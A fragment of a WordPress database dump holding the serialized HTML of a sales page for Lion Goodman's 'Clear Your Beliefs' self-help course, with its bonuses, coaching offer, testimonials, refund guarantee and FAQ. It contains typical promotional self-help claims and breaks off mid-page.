Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^\\//,'''')+''/'' == this.pathname.replace(/^\\//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1666, 2083, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:70784:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life 